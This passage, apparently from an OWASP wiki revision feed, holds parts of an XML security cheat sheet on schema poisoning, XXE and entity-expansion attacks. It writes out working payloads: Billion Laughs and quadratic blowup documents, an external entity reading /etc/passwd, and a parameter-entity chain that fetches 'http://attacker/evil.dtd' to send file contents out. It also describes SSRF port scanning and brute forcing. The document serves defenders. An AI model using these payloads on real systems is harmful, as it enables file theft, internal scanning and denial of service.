When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
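When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities. The XML specification forbids such recursion, so a conforming parser should report an error; a parser that fails to detect it may keep expanding the entities until resources are exhausted:&lt;br /&gt;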
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). The result of the following attack will be 100,000 * 100,000 characters (10 billion) in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities declared in the following code, the application starts consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these expands to 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the parser has to produce 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, that is, 3*10^9 (3,000,000,000) characters, which can exhaust the CPU and/or memory and make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser does not follow the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE soap:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT soap:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST soap:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;soap:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the reference is expanded inside the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information returned by a port scan depend on the implementation. Responses can be classified as follows, ranked from easiest to most complex to exploit:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and least common scenario: with complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If connections to a closed port time out (which may take one minute) whereas connections to an open port return very quickly (in one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty is to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
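&lt;br /&gt;
As a minimal sketch, such a guess could be carried in an external entity. The example reuses the placeholder scheme &amp;lt;tt&amp;gt;foo&amp;lt;/tt&amp;gt; and host from the URI above, and the entity name &amp;lt;tt&amp;gt;guess&amp;lt;/tt&amp;gt; is hypothetical; whether the credentials are actually sent depends on how the parser’s URL handler treats the user information part, which is an assumption here:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!-- hypothetical entity name; one username:password guess per document --&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY guess SYSTEM &amp;quot;foo://username:password@example.com:8080/&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;guess;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Each document tests a single pair; the outcome would have to be inferred from the response, the error output, or the timing, as in the port scanning cases described earlier.&lt;br /&gt;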
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224437</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224437"/>
				<updated>2016-12-21T20:24:03Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, this must be treated as a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will replace the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
